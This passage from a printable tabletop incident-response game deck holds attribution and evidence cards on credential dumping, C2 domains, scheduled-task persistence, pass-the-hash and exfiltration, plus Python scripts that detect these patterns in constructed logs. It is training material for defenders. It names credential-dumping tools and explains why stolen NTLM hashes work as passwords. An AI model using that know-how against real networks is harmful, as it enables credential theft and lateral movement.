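            found.append((ref, span, sorted(s.source for s in seen)))
    return found


def render(timeline: list[Event]) -> list[str]:
    """One line per event, each citing its evidence source."""
    return [f"{e.ts:%Y-%m-%d %H:%M:%S}Z  {e.phase:<14} {e.detail}  [src: {e.source}]"
            for e in timeline]


if __name__ == "__main__":
    tl = build_timeline()
    print("\n".join(render(tl)))
    print("dwell time:", dwell_time(tl))
    for ref, span, srcs in clock_discrepancies(tl):
        print(f"discrepancy {ref}: {span} between {srcs}")
```

The 65-second gap between the firewall and the Windows log for the same logon is the kind of discrepancy the card's "+1 if team notes discrepancies and explains them" modifier rewards documenting.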

THREAT-01: Threat Attribution Analysis

╔════════════════════════════════════════════════════════════════╗
║              THREAT-01: THREAT ATTRIBUTION ANALYSIS            ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Threat Intelligence & Attribution                   ║
║ MITRE ATT&CK: G#### group / S#### software identification      ║
║              Requires synthesis of all prior evidence           ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15                                           ║
║ Budget Cost: 20                                                ║
║ Duration: 3 turns                                              ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Synthesize all collected evidence (malware, infrastructure,    ║
║ tactics, timeline) to attribute the attack to a                ║
║ known threat group, nation-state, or attacker profile. Includes║
║ cross-referencing with threat intelligence databases, academic ║
║ papers, and law enforcement data. This is the highest-level    ║
║ attribution analysis.                                          ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Similar attacks in CTI databases (VirusTotal, OSINT, etc)   ║
║ - Malware signatures matching known threat groups              ║
║ - Tactics & Techniques (TTPs) matching known profiles          ║
║ - Infrastructure (domains, IPs) linked to known campaigns      ║
║ - Language/coding style hints about attacker origin            ║
║ - Geolocation clues from timestamps and infrastructure         ║
║ - Victim profile matching known group targeting patterns       ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15):                                        ║
║ Discover ONE Evidence card: Threat Attribution Report with     ║
║ confidence level (60-90%) linking to specific threat group.    ║
║ Advance (only if no Evidence card produced):                   ║
║ Attribution Confidence +35%, Attack Chain +10%                 ║
║                                                                 ║
║ PARTIAL SUCCESS (roll 13-14):                                  ║
║ Partial attribution (likely group/profile but not 100% certain)║
║ Advance: Attribution Confidence +25%, Attack Chain +5%         ║
║                                                                 ║
║ FAILURE (roll < 13):                                           ║
║ Insufficient evidence for reliable attribution.                ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Attribution must cite specific evidence for each finding.      ║
║ Chain of Custody: Moderate (depends on CTI source reliability) ║
║ ⚠ Confidence level must be documented (70% vs. 90% certainty) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has threat intelligence background          ║
║ +1 if access to premium CTI services (CrowdStrike, Mandiant)  ║
║ +1 per prior investigation showing strong evidence patterns    ║
║ +2 if detailed narrative synthesizes multiple evidence sources ║
║ -2 if evidence is sparse or conflicting                        ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Highest difficulty (DC 15) requires extensive prior evidence ║
║ • Cannot be done until sufficient evidence collected           ║
║ • Most valuable action for reaching Victory Condition 1        ║
║ • Attribution confidence matters: 60% vs. 95% is significant   ║
║ • Final step in forensic investigation                         ║
╚════════════════════════════════════════════════════════════════╝

Printable Format

How to Print Cards

Materials Needed:
- Cardstock (250 gsm minimum)
- Card sleeves (optional but recommended)
- Scissors or guillotine cutter
- Ruler and cutting mat

Printing Instructions:
1. Print each card on heavy cardstock (250 gsm)
2. Cut along the border (approx. 3.5" x 5.5" for standard card size)
3. Optional: Laminate for durability
4. Optional: Sleeve cards for shuffling and handling

PDF Layout: [Card layout with 4-6 cards per page will be generated separately in printable PDF format]


Card Combination & Strategy

Investigation Pathways

Pathway 1: Quick Start (Turns 1-3) - LOG-01 (Event Log Analysis) → Timeline Reconstruction → Identify key events

Pathway 2: Deep Evidence (Turns 1-5) - DISK-01 (Disk Image) → MALW-01 (Dynamic Analysis) → MALW-02 (Static Analysis) → Understand full malware

Pathway 3: Network-Based (Turns 1-5) - LOG-01 (Initial timeline) → NET-01 (Network Traffic) → NET-02 (Deep Packet Analysis) → Reconstruct C2

Pathway 4: Attribution (Turns 1-6) - MALW-01/02 → NET-01 → THREAT-01 → Complete attribution with infrastructure evidence


FAQ

Q: Can I do these investigations in any order? A: Yes, but some combinations are more efficient. Multiple investigations often support each other.

Q: What's the DC difficulty based on? A: Skill required. Easier investigations (LOG-01, TIMELINE-01) have DC 11-13. Complex investigations (MEM-02, THREAT-01) have DC 14-15.

Q: Why do some investigations take 3 turns? A: They represent weeks of real forensic work compressed into game turns. Mechanically (v2.2): pay the cost and use your action on the turn you start; the roll and results arrive at the start of the turn the Duration completes. Only one multi-turn investigation may be in flight at a time.

Q: What modifiers apply to my roll? A: Skill (+1 to +3), narrative explanation (+1 to +2), prior investigations (+1), challenge circumstances (-1 to -2).


Version History

cards/forensics/core-deck/evidence-cards.md

Forensics Module: Evidence & Findings Cards (Core Deck)

Version: 2.2 - Playtest Edition
Card Count: 12 Evidence Cards + 4 Findings Cards = 16 Total
Printable: Yes


Overview

Evidence Cards represent specific findings discovered during forensic investigations. They document what was found, how it was found, and what investigative leads it provides.

Findings Cards represent conclusions drawn from the evidence—these feed recommendations into Hardening, Network Building, and Audit modules.

Chain of Custody rule (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This stacks with any Chain of Custody impact printed on the card.

No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed "Impact on Progress Meters" (plus the Chain of Custody handling bonus above). The investigation card's own advance line applies only when no Evidence card is produced (e.g., partial success).


Evidence Card Structure

Each Evidence Card includes:
- Card ID: Unique identifier (EVD-01 through EVD-12)
- Type: Category of evidence (Malware, Credentials, Movement, Exfiltration, Infrastructure, Timeline)
- Title: Specific finding name
- MITRE ATT&CK: Technique this evidence relates to
- Description: What was found and where
- Discovery Source: Which Investigation Action cards typically find this evidence
- Chain of Custody: Admissibility rating (Strong/Moderate/Weak)
- Investigative Lead: What the team can do next with this finding
- Connection to Attack: Links to threat cards and attack phases


Evidence Cards (12 Total)

EVD-01: Credential Dumper Malware

╔════════════════════════════════════════════════════════════════╗
║              EVD-01: CREDENTIAL DUMPER MALWARE                 ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1003 (OS Credential Dumping), T1556 (Modify     ║
║              Authentication Process)                           ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Malware sample recovered from compromised system that dumps    ║
║ user credentials (SAM file, LSASS process, password hashes,    ║
║ or Kerberos tickets). Examples: Mimikatz, PwDump, LaZagne.     ║
║                                                                 ║
║ Where It Was Found:                                            ║
║ - In System32 directory (hidden with attributes)               ║
║ - In %Temp% directory (temporary staging)                      ║
║ - In admin user AppData (stealth installation)                 ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker objective: Privilege escalation                     ║
║ - Persistence vector: Credential harvesting                    ║
║ - Attack phase: Privilege escalation → lateral movement        ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Binary file can be hashed (MD5, SHA-1, SHA-256)             ║
║ - File timestamps document creation/modification               ║
║ - Admissible in court with hash validation                     ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01/DISK-02: Found as file artifact                      ║
║ - MEM-01/MEM-02: Found as running process in memory            ║
║ - MALW-01: Behavior shows credential dumping actions           ║
║ - MALW-02: Code analysis identifies dumping capabilities       ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found a credential dumper. Let's analyze its behavior      ║
║ (MALW-01) to understand exactly what credentials were captured.║
║ Then we can assume those accounts are compromised."            ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (shows escalation phase)                  ║
║ - Attribution: +10% (dumper choice shows sophistication)       ║
║ - Timeline: +10% (timestamp shows when escalation occurred)    ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement credential guard to prevent dumping"   ║
║ → NETWORK BUILDING: "Isolate admin credentials in PAW"         ║
║ → AUDIT: "Verify controls around credential access logging"    ║
╚════════════════════════════════════════════════════════════════╝

EVD-02: Command-and-Control Callback Domain

╔════════════════════════════════════════════════════════════════╗
║              EVD-02: C2 CALLBACK DOMAIN                        ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure                                    ║
║ MITRE ATT&CK: T1071 (Application Layer Protocol), T1573        ║
║              (Encrypted Channel), T1008 (Fallback Channels)    ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Domain name or IP address that malware communicates with for   ║
║ command and control. Examples:                                 ║
║ - checkupdate.ru (looks legitimate but is attacker-controlled) ║
║ - 192.0.2.45 (direct IP address)                              ║
║                                                                 ║
║ Where It Was Found:                                            ║
║ - In malware strings (hardcoded in binary)                     ║
║ - In network traffic (outbound connections)                    ║
║ - In memory (communication buffers)                            ║
║ - In DNS logs (DNS queries)                                    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker still has access (if domain still active)           ║
║ - C2 infrastructure operator (may be reused in other campaigns)║
║ - Attack sophistication (legitimate-looking domain =           ║
║   higher skill)                                                ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Network logs document domain/IP communication                ║
║ - PCAP files timestamp the traffic                             ║
║ - DNS logs show query history                                  ║
║ - Admissible with supporting traffic analysis                  ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MALW-01: Dynamic analysis shows C2 connections               ║
║ - MALW-02: Static analysis finds hardcoded domains             ║
║ - NET-01: Network traffic analysis identifies unusual domains  ║
║ - NET-02: Deep packet inspection reconstructs C2 commands      ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found the C2 domain. Let's do THREAT-01 analysis to:       ║
║ - WHOIS lookup (registrant info)                               ║
║ - Historical DNS records (see past resolutions)                ║
║ - Infrastructure mapping (what else is hosted on this IP?)     ║
║ - Passive DNS (VirusTotal, Shodan, etc)"                       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (confirms persistence vector)             ║
║ - Attribution: +25% (infrastructure links to threat group)     ║
║ - Timeline: +5% (timestamps when C2 was active)                ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Block C2 domain via firewall, DNS sinkhole"      ║
║ → NETWORK BUILDING: "Implement egress filtering to C2 ranges"  ║
║ → AUDIT: "Review firewall rules for C2 domain blocking"        ║
║                                                                 ║
║ THREAT INTEL:                                                  ║
║ Can be shared with ISP/CISA for coordinated takedown/blocking. ║
╚════════════════════════════════════════════════════════════════╝

EVD-03: Persistence Mechanism (Scheduled Task)

╔════════════════════════════════════════════════════════════════╗
║              EVD-03: PERSISTENCE MECHANISM (SCHEDULED TASK)    ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1053 (Scheduled Task/Job), T1543 (Create/Modify ║
║              System Process)                                   ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Scheduled task or cron job configured to execute malware at    ║
║ regular intervals (hourly, daily, on system startup). Ensures  ║
║ malware runs even if process is killed or system reboots.      ║
║                                                                 ║
║ Example:                                                       ║
║ - Task: "Windows_Update_Service" (disguised name)              ║
║ - Runs: System startup + every 4 hours                         ║
║ - Executes: C:\Windows\System32\msupd.exe (hidden location)    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker skill level (simple but effective)                  ║
║ - Intent: Long-term access/persistence                         ║
║ - Sophistication: Low-to-medium (persistence is basic)         ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Task definition stored in XML (Windows registry/filesystem)  ║
║ - Can be exported and hashed                                   ║
║ - Creation/modification timestamps available                   ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01: Task files in Windows registry/filesystem           ║
║ - LOG-01: Task execution appears in logs                       ║
║ - MEM-01: Task execution visible in running processes          ║
║ - MALW-01: Dynamic analysis shows task creation               ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found a scheduled task executing malware. Key questions:   ║
║ - When was this task created? (timestamp analysis)             ║
║ - What executable does it run? (acquire and analyze - MALW-01) ║
║ - Is the executable still present? (filesystem search)         ║
║ - Is the task still active? (persistence threat)"              ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (clearly shows persistence phase)         ║
║ - Timeline: +15% (task timestamps date persistence install)    ║
║ - Attribution: +5% (persistence technique is common)           ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement AppLocker/code signing for scheduled   ║
║              task executables"                                 ║
║ → NETWORK BUILDING: "Enable scheduled task logging & analysis" ║
║ → AUDIT: "Verify controls on scheduled task creation"          ║
╚════════════════════════════════════════════════════════════════╝

EVD-04: Suspicious Admin Login (Timeline)

╔════════════════════════════════════════════════════════════════╗
║              EVD-04: SUSPICIOUS ADMIN LOGIN (TIMELINE)         ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Credentials & Access                                     ║
║ MITRE ATT&CK: T1078 (Valid Accounts), T1021 (Remote Services), ║
║              T1550 (Use Alternate Authentication Material)     ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Administrator account login with suspicious characteristics:   ║
║ - Unusual time (3 AM instead of business hours)                ║
║ - Unusual location (different country/VPN)                     ║
║ - Unusual source (remote desktop instead of VPN)               ║
║ - Batch processing (multiple logins in seconds)                ║
║                                                                 ║
║ Example Log Entry:                                             ║
║ 2024-10-15 03:22:15 - User: Administrator                      ║
║ Source: 192.0.2.100 (Russia)                                   ║
║ Protocol: RDP / SSH                                            ║
║ Success: Yes                                                   ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Credential compromise (credentials being used by attacker)   ║
║ - Privilege level compromised (admin account)                  ║
║ - Lateral movement likely (attacker on network now)            ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Log entry with timestamp and source                          ║
║ - Forwarded to a central collector (tamper-evident copy)       ║
║ - Corroborated by other log sources                            ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-01: Event Log Analysis shows unusual logon event         ║
║ - LOG-02: Correlation across multiple systems                  ║
║ - TIMELINE-01: Used to establish attack progression            ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Admin account was compromised. Questions to answer:           ║
║ - When was the password changed? (before or after login?)      ║
║ - What other logins occurred after this? (lateral movement)    ║
║ - Was there any password reset? (attacker covering tracks)     ║
║ - What systems did this account access? (scope of compromise)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (clear escalation point)                  ║
║ - Timeline: +25% (login timestamp anchors timeline)            ║
║ - Attribution: +10% (geolocation may hint at attacker origin)  ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement MFA on admin accounts"                 ║
║ → NETWORK BUILDING: "Admin access only from a Privileged       ║
║              Access Workstation (PAW)"                         ║
║ → AUDIT: "Review admin account access controls and logging"    ║
╚════════════════════════════════════════════════════════════════╝

EVD-05: Lateral Movement Evidence (Pass-the-Hash)

╔════════════════════════════════════════════════════════════════╗
║              EVD-05: LATERAL MOVEMENT (PASS-THE-HASH)          ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Lateral Movement                                         ║
║ MITRE ATT&CK: T1550.002 (Pass the Hash), T1003 (OS Credential  ║
║              Dumping), T1021 (Remote Services)                 ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence that attacker used stolen password hashes to access   ║
║ other systems without knowing the plaintext password. NTLM     ║
║ authenticates with the hash itself, so a dumped hash is as good║
║ as the password on every host that accepts it.                 ║
║                                                                ║
║ What It Shows:                                                 ║
║ - Compromised account: admin-user (hash: A1B2C3D4E5F6...)      ║
║ - Lateral targets: File server, database server, backup server ║
║ - Movement pattern: Sequential access across infrastructure    ║
║ - Telltale: Event 4624, Logon Type 3, auth package NTLM, on    ║
║   hosts where Kerberos is the norm for that account            ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Attack sophistication (understanding Windows auth)           ║
║ - Network enumeration (attacker knew what systems exist)       ║
║ - Scope of compromise (multiple systems accessed)              ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Hash captured from LSASS memory or the SAM hive              ║
║ - Corroborated by network logs (successful auth events)        ║
║ - Extracted hash can be matched to the account's stored hash   ║
║ - Admissible with supporting evidence (network logs)           ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-02: Cross-system log correlation shows pattern           ║
║ - NET-01: Network traffic shows auth attempts                  ║
║ - MEM-01/MEM-02: Hash visible in memory                        ║
║ - DISK-01/DISK-02: SAM file contains hashes                    ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker used pass-the-hash technique. Next steps:            ║
║ - Determine all systems accessed with this hash                ║
║ - Check what actions were taken on each system                 ║
║ - Look for privilege escalation or data access on each system" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +25% (shows sophisticated lateral movement)    ║
║ - Timeline: +15% (timestamps show movement sequence)           ║
║ - Attribution: +15% (technique sophistication shows skill)     ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement Credential Guard, Mimikatz mitigations"║
║ → NETWORK BUILDING: "Network segmentation to limit lateral move"║
║ → AUDIT: "Verify Controls on credential reuse prevention"      ║
╚════════════════════════════════════════════════════════════════╝

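The two cards above describe what a suspicious admin logon (EVD-04) and a pass-the-hash chain (EVD-05) look like in logon events. The script below is an added example written for this edition, not part of the game's own material: it runs the card's checks over a handful of constructed 4624-style events (off-hours, RDP from outside the PAW subnet, external source, burst of logons) and then pulls the ordered NTLM network-logon hops for one account, which is the pass-the-hash footprint when the domain otherwise uses Kerberos. The business-hours window, the PAW subnet 10.0.9.0/24 and the internal range 10.0.0.0/8 are assumed policy values.

```python
"""Logon-event triage for the EVD-04 and EVD-05 patterns: admin logons that
are off-hours, from outside the PAW network or from external space, bursts
of admin logons, and a chain of NTLM network logons tracing pass-the-hash
movement. Events are constructed for this example, not real logs."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed 4624-style events (logon type 3 = network, 10 = RDP).
SAMPLE_EVENTS = [
    {"time": "2024-10-15 03:22:15", "host": "DC01", "user": "Administrator",
     "logon_type": 10, "auth": "NTLM", "src": "192.0.2.100"},
    {"time": "2024-10-15 03:22:17", "host": "FS01", "user": "admin-user",
     "logon_type": 3, "auth": "NTLM", "src": "10.0.5.20"},
    {"time": "2024-10-15 03:22:19", "host": "DB01", "user": "admin-user",
     "logon_type": 3, "auth": "NTLM", "src": "10.0.5.20"},
    {"time": "2024-10-15 03:22:21", "host": "BK01", "user": "admin-user",
     "logon_type": 3, "auth": "NTLM", "src": "10.0.5.20"},
    {"time": "2024-10-15 09:15:00", "host": "FS01", "user": "jdoe",
     "logon_type": 3, "auth": "Kerberos", "src": "10.0.5.44"},
    {"time": "2024-10-15 10:02:00", "host": "DC01", "user": "admin-user",
     "logon_type": 10, "auth": "Kerberos", "src": "10.0.9.5"},
]
ADMIN_USERS = {"Administrator", "admin-user"}
# Assumed policy: admin RDP only from the PAW subnet, 08:00-18:00 local.
PAW_NET = ip_network("10.0.9.0/24")
INTERNAL_NETS = [ip_network("10.0.0.0/8")]
BUSINESS_HOURS = (8, 18)


def _ts(ev):
    return datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")


def flag_admin_logons(events, burst_window=timedelta(seconds=10), burst_n=3):
    """Return [(event, [reasons])] for admin logons with EVD-04 traits."""
    admin = sorted((e for e in events if e["user"] in ADMIN_USERS), key=_ts)
    flagged = []
    for ev in admin:
        t, src = _ts(ev), ip_address(ev["src"])
        reasons = []
        if not BUSINESS_HOURS[0] <= t.hour < BUSINESS_HOURS[1]:
            reasons.append("off-hours")
        if ev["logon_type"] == 10 and src not in PAW_NET:
            reasons.append("rdp-from-non-paw")
        if not any(src in net for net in INTERNAL_NETS):
            reasons.append("external-source")
        # Burst: burst_n logons for the same account within +/- the window.
        near = [e for e in admin if e["user"] == ev["user"]
                and abs(_ts(e) - t) <= burst_window]
        if len(near) >= burst_n:
            reasons.append("burst")
        if reasons:
            flagged.append((ev, reasons))
    return flagged


def pth_chain(events, user):
    """Ordered (src, host, time) of NTLM network logons for `user`. In a
    Kerberos domain, NTLM type-3 logons from one source fanning out across
    servers is the pass-the-hash footprint described in EVD-05."""
    hops = [e for e in events if e["user"] == user and e["logon_type"] == 3
            and e["auth"].upper() == "NTLM"]
    return [(e["src"], e["host"], e["time"]) for e in sorted(hops, key=_ts)]


if __name__ == "__main__":
    for ev, why in flag_admin_logons(SAMPLE_EVENTS):
        print(ev["time"], ev["user"], ev["host"], ", ".join(why))
    print("PtH chain:", pth_chain(SAMPLE_EVENTS, "admin-user"))
```

The burst check looks at a window on both sides of each event so every logon in the burst is flagged, not only the first. The NTLM filter is deliberately narrow: a service account that legitimately uses NTLM will show up here too, so the chain is a lead to corroborate with the target hosts' own logs, not a verdict.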
EVD-06: Data Exfiltration Evidence

╔════════════════════════════════════════════════════════════════╗
║              EVD-06: DATA EXFILTRATION EVIDENCE                ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Exfiltration                                             ║
║ MITRE ATT&CK: T1020 (Automated Exfiltration), T1030 (Data      ║
║              Transfer Size Limits), T1048 (Exfil Over Alt      ║
║              Protocol)                                         ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence of large data transfer from internal network to       ║
║ external attacker-controlled destination.                      ║
║                                                                ║
║ Characteristics:                                               ║
║ - Volume: 100+ GB transferred in 6-hour window                 ║
║ - Timing: During non-business hours (3-8 AM)                   ║
║ - Destination: External IP/domain (attacker server)            ║
║ - Protocol: HTTPS, FTP, or custom; if encrypted, volume and    ║
║   destination are what the flow records give you               ║
║ - Pattern: Consistent data rate (not bandwidth-throttled)      ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Scope of compromise (what was accessed)                      ║
║ - Attacker objective (data theft vs. ransomware)               ║
║ - Attack timeline (when exfiltration occurred)                 ║
║ - Attacker infrastructure (location of receiving server)       ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Network flow logs (NetFlow, sFlow, or IDS logs)              ║
║ - PCAP files with packet timestamps                            ║
║ - Firewall logs documenting outbound connections               ║
║ - Hashes of recovered staging archives tie the flow to files   ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - NET-01: Network traffic analysis shows volume anomalies      ║
║ - NET-02: Packet inspection shows data being transferred       ║
║ - LOG-02: Firewall/proxy logs show external connections        ║
║ - MALW-01: Dynamic analysis shows file staging before exfil   ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Massive data exfiltration detected. Critical questions:       ║
║ - Exactly which files/databases were exfiltrated?              ║
║ - How many customer records are affected?                      ║
║ - Can we identify specific data types stolen?                  ║
║ - Is the data still being transferred (ongoing threat)?"       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (confirms attacker objectives)            ║
║ - Timeline: +20% (exfil duration/timing)                       ║
║ - Attribution: +10% (exfil infrastructure may be reused)       ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Data loss prevention (DLP) controls"             ║
║ → NETWORK BUILDING: "Egress filtering, traffic inspection"     ║
║ → DISASTER RECOVERY: "Breach notification scope (data volume)" ║
║ → AUDIT: "Data protection controls and encryption review"      ║
╚════════════════════════════════════════════════════════════════╝

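The characteristics EVD-06 lists (volume far above baseline, off-hours, one external destination, a steady rate) are exactly what an analyst computes from flow records. The following is an added example for this edition, not the game's own code: it aggregates constructed NetFlow-style records per internal-source/external-destination pair, compares the total against an assumed per-host daily baseline, and reports the window, the average rate and whether the rate was steady enough to be a bulk push rather than interactive use. The 10.0.0.0/8 internal range, the baseline figures and the 10x threshold are assumptions.

```python
"""Flow-record triage for EVD-06: find an internal host pushing an abnormal
volume to one external destination and report when, how fast and how steady.
Flow records and the per-host baseline are constructed for this example."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

INTERNAL = ip_network("10.0.0.0/8")
GB = 1024 ** 3
# (start, end, src, dst, dport, bytes): NetFlow-style records. FS01 pushes
# ~17 GB per hour to one external host from 02:00 to 08:00 (constructed).
SAMPLE_FLOWS = [("2024-10-16 %02d:00:00" % h, "2024-10-16 %02d:00:00" % (h + 1),
                 "10.0.5.20", "198.51.100.9", 443, 17 * GB) for h in range(2, 8)]
SAMPLE_FLOWS += [
    ("2024-10-16 10:00:00", "2024-10-16 10:05:00", "10.0.5.44", "203.0.113.7", 443, 40 * 1024 ** 2),
    ("2024-10-16 11:00:00", "2024-10-16 11:01:00", "10.0.5.20", "10.0.5.44", 445, 2 * GB),
]
# Assumed daily egress baseline per host, bytes (from a quiet reference week).
BASELINE = {"10.0.5.20": 2 * GB, "10.0.5.44": 1 * GB}


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def egress_summary(flows):
    """Aggregate internal->external flows per (src, dst): bytes, span, rates."""
    agg = defaultdict(lambda: {"bytes": 0, "first": None, "last": None, "rates": []})
    for start, end, src, dst, _dport, nbytes in flows:
        if ip_address(src) not in INTERNAL or ip_address(dst) in INTERNAL:
            continue  # only traffic leaving the network counts as egress
        a, s, e = agg[(src, dst)], _t(start), _t(end)
        a["bytes"] += nbytes
        a["first"] = s if a["first"] is None else min(a["first"], s)
        a["last"] = e if a["last"] is None else max(a["last"], e)
        secs = max((e - s).total_seconds(), 1)
        a["rates"].append(nbytes * 8 / secs / 1e6)  # Mbit/s for this record
    return agg


def flag_exfil(flows, factor=10, business_hours=(8, 18)):
    """Pairs whose egress exceeds factor x the source's baseline, with the
    timing and rate-steadiness traits the card lists."""
    out = []
    for (src, dst), a in egress_summary(flows).items():
        if a["bytes"] < factor * BASELINE.get(src, 1 * GB):
            continue
        rates = a["rates"]
        cv = pstdev(rates) / mean(rates) if len(rates) > 1 else 0.0
        out.append({
            "src": src, "dst": dst,
            "gb": round(a["bytes"] / GB, 1),
            "window_h": round((a["last"] - a["first"]).total_seconds() / 3600, 1),
            "off_hours": not business_hours[0] <= a["first"].hour < business_hours[1],
            "avg_mbps": round(mean(rates), 1),
            # A near-constant rate is a bulk push, not interactive use.
            "steady": cv < 0.2,
        })
    return out


if __name__ == "__main__":
    for hit in flag_exfil(SAMPLE_FLOWS):
        print(hit)
```

Over HTTPS the payload is opaque, so this is all the network side can say; pairing the byte count with the size of a staging archive found on disk (EVD-11) is what turns "a lot left" into "these files left".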
EVD-07: Attacker Infrastructure Map

╔════════════════════════════════════════════════════════════════╗
║              EVD-07: ATTACKER INFRASTRUCTURE MAP               ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure                                    ║
║ MITRE ATT&CK: T1583 (Acquire Infrastructure), T1071 (App Layer ║
║              Protocol) for the C2 channel                      ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Connected map of attacker-controlled infrastructure including  ║
║ multiple domains, IP addresses, registrars, and services.      ║
║                                                                 ║
║ Example Infrastructure Web:                                    ║
║ - Primary C2: checkupdate.ru (IP: 192.0.2.45)                  ║
║ - Alternate C2: update-service.xyz (IP: 192.0.2.46)            ║
║ - Malware hosting: files.example.net (IP: 192.0.2.47)          ║
║ - Registrar: all three registered through registrar.ru         ║
║ - ASN: AS64512 (Ukrainian ISP; AS64512 is a private-use number ║
║   used here as a placeholder, like the 192.0.2.0/24 IPs)       ║
║                                                                ║
║ What It Reveals:                                               ║
║ - Attacker operational security (redundant infrastructure)     ║
║ - Attacker resources (ISP relationships, hosting account)      ║
║ - Attacker location hints (registrar, ASN, geolocation)        ║
║ - Attack history (domains registered months/years earlier)     ║
║ - Other campaigns (infrastructure reused for other attacks)    ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - WHOIS records are public but can be modified or redacted     ║
║ - Historical DNS data from passive DNS services                ║
║ - Correlations need cross-referencing                          ║
║ - Admissible with supporting evidence (traffic logs)           ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - THREAT-01: Threat attribution analysis connects domains      ║
║ - MALW-02: Static analysis finds hardcoded backup domains      ║
║ - NET-01: Network traffic shows multiple C2 attempts           ║
║ - CTI research: VirusTotal, Shodan, passive DNS services       ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We've mapped attacker infrastructure. Next steps:             ║
║ - Search threat intelligence databases for this infrastructure ║
